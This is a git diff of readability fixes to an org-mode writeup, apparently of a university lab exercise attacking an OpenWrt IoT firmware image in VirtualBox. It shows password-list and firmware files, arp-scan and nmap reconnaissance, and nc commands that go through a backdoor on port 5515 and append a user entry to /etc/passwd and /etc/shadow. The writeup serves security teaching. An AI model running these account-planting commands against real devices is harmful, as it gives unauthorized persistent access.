Some small fixes to improve readability
parent
e9d1b989ee
commit
9507504b2f
20
writeup.org
20
writeup.org
|
@ -4,7 +4,7 @@
|
||||||
|
|
||||||
* Vulnerabilty Analysis
|
* Vulnerabilty Analysis
|
||||||
Given files:
|
Given files:
|
||||||
#+begin_src sh :results output :exports results :cache yes
|
#+begin_src sh :results output :exports both :cache yes
|
||||||
ls ./data/ -lA
|
ls ./data/ -lA
|
||||||
#+end_src
|
#+end_src
|
||||||
|
|
||||||
|
@ -15,7 +15,7 @@
|
||||||
: -rw-r--r-- 1 tuan tuan 9778176 Jun 29 13:33 Sysssec IoT Device.ova
|
: -rw-r--r-- 1 tuan tuan 9778176 Jun 29 13:33 Sysssec IoT Device.ova
|
||||||
|
|
||||||
- ~passwords.txt~: Password list for brute forcing
|
- ~passwords.txt~: Password list for brute forcing
|
||||||
#+begin_src sh :results output :exports results :cache yes
|
#+begin_src sh :results output :exports both :cache yes
|
||||||
file ./data/passwords.txt
|
file ./data/passwords.txt
|
||||||
#+end_src
|
#+end_src
|
||||||
|
|
||||||
|
@ -23,7 +23,7 @@
|
||||||
: ./data/passwords.txt: ASCII text
|
: ./data/passwords.txt: ASCII text
|
||||||
|
|
||||||
- ~Syssec IoT Device.bin~: Firmware binary of target for static analysis
|
- ~Syssec IoT Device.bin~: Firmware binary of target for static analysis
|
||||||
#+begin_src sh :results output :exports results :cache yes
|
#+begin_src sh :results output :exports both :cache yes
|
||||||
file ./data/Syssec\ IoT\ Device.bin
|
file ./data/Syssec\ IoT\ Device.bin
|
||||||
#+end_src
|
#+end_src
|
||||||
|
|
||||||
|
@ -31,7 +31,7 @@
|
||||||
: ./data/Syssec IoT Device.bin: firmware 4300 v1 OpenWrt r16916-7f946a880a, 8126464 bytes or less, at 0x200 2054221 bytes , at 0x1f5a50 2813038 bytes
|
: ./data/Syssec IoT Device.bin: firmware 4300 v1 OpenWrt r16916-7f946a880a, 8126464 bytes or less, at 0x200 2054221 bytes , at 0x1f5a50 2813038 bytes
|
||||||
|
|
||||||
- ~Sysssec IoT Device.ova~: Virtual Box image of target for dynamic analysis
|
- ~Sysssec IoT Device.ova~: Virtual Box image of target for dynamic analysis
|
||||||
#+begin_src sh :results output :exports results :cache yes
|
#+begin_src sh :results output :exports both :cache yes
|
||||||
file ./data/Sysssec\ IoT\ Device.ova
|
file ./data/Sysssec\ IoT\ Device.ova
|
||||||
#+end_src
|
#+end_src
|
||||||
|
|
||||||
|
@ -64,7 +64,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
||||||
To do this I had to add a network interface on the Virtual Box management interface.
|
To do this I had to add a network interface on the Virtual Box management interface.
|
||||||
|
|
||||||
After doing that I got the necessary network interface.
|
After doing that I got the necessary network interface.
|
||||||
#+begin_src sh :results output :exports results :cache yes
|
#+begin_src sh :results output :exports both :cache yes
|
||||||
ifconfig vboxnet0
|
ifconfig vboxnet0
|
||||||
#+end_src
|
#+end_src
|
||||||
|
|
||||||
|
@ -80,7 +80,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
||||||
:
|
:
|
||||||
|
|
||||||
Afterwards an arpscan was possible:
|
Afterwards an arpscan was possible:
|
||||||
#+begin_src sh :results output :exports results :cache yes :dir /sudo::. :async
|
#+begin_src sh :results output :exports both :cache yes :dir /sudo::. :async
|
||||||
arp-scan --interface vboxnet0 --local
|
arp-scan --interface vboxnet0 --local
|
||||||
#+end_src
|
#+end_src
|
||||||
|
|
||||||
|
@ -101,7 +101,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
||||||
Scanning both devices with nmap shows, that ~192.168.56.100~ doesn't have open ports, so it doesnt seem to be our target device.
|
Scanning both devices with nmap shows, that ~192.168.56.100~ doesn't have open ports, so it doesnt seem to be our target device.
|
||||||
|
|
||||||
Here I simply create a variable for our targets IP-address, so we don't have to remember it and enter it manually.
|
Here I simply create a variable for our targets IP-address, so we don't have to remember it and enter it manually.
|
||||||
#+begin_src sh :exports none :cache yes
|
#+begin_src sh :exports both :cache yes
|
||||||
TARGET=192.168.56.101
|
TARGET=192.168.56.101
|
||||||
echo $TARGET
|
echo $TARGET
|
||||||
#+end_src
|
#+end_src
|
||||||
|
@ -109,9 +109,9 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
||||||
#+RESULTS[e651e12124dbd06fdedd668151d35ece3ac2dd42]:
|
#+RESULTS[e651e12124dbd06fdedd668151d35ece3ac2dd42]:
|
||||||
: 192.168.56.101
|
: 192.168.56.101
|
||||||
|
|
||||||
~192.168.56.101~ returns the following nmap scan:
|
nmap on ~192.168.56.101~ returns the following result:
|
||||||
#+begin_src sh :results output :exports both :cache yes :eval query :var TARGET="192.168.56.101" :async
|
#+begin_src sh :results output :exports both :cache yes :eval query :var TARGET="192.168.56.101" :async
|
||||||
nmap $TARGET -p-
|
nmap $TARGET -p-
|
||||||
#+end_src
|
#+end_src
|
||||||
|
|
||||||
#+RESULTS[abdd9931accb0b2a75ae935a706feaf4d361f9c7]:
|
#+RESULTS[abdd9931accb0b2a75ae935a706feaf4d361f9c7]:
|
||||||
|
@ -231,7 +231,7 @@ Note! This error could also mean that an incompatible version of the 'Oracle VM
|
||||||
|
|
||||||
With the backdoor detected on port ~5515~ we can netcat onto it and get a shell.
|
With the backdoor detected on port ~5515~ we can netcat onto it and get a shell.
|
||||||
|
|
||||||
To add the user =tuan= and with the password =password= we executed the following code snippets:
|
To add the user =tuan= with the password =password= we executed the following code snippets:
|
||||||
#+begin_src sh :results output :exports code :cache yes :var TARGET="192.168.56.101" :async
|
#+begin_src sh :results output :exports code :cache yes :var TARGET="192.168.56.101" :async
|
||||||
echo "echo tuan:x:1001:1001::/root:/bin/ash >> /etc/passwd;exit" | nc -nv $TARGET 5515
|
echo "echo tuan:x:1001:1001::/root:/bin/ash >> /etc/passwd;exit" | nc -nv $TARGET 5515
|
||||||
echo 'echo tuan:\$1\$123456\$qqQvjw0PqIk7otmzNsUIN0:18145:0:99999:7::: >> /etc/shadow;exit' | nc -nv $TARGET 5515
|
echo 'echo tuan:\$1\$123456\$qqQvjw0PqIk7otmzNsUIN0:18145:0:99999:7::: >> /etc/shadow;exit' | nc -nv $TARGET 5515
|
||||||
|
|
Loading…
Reference in New Issue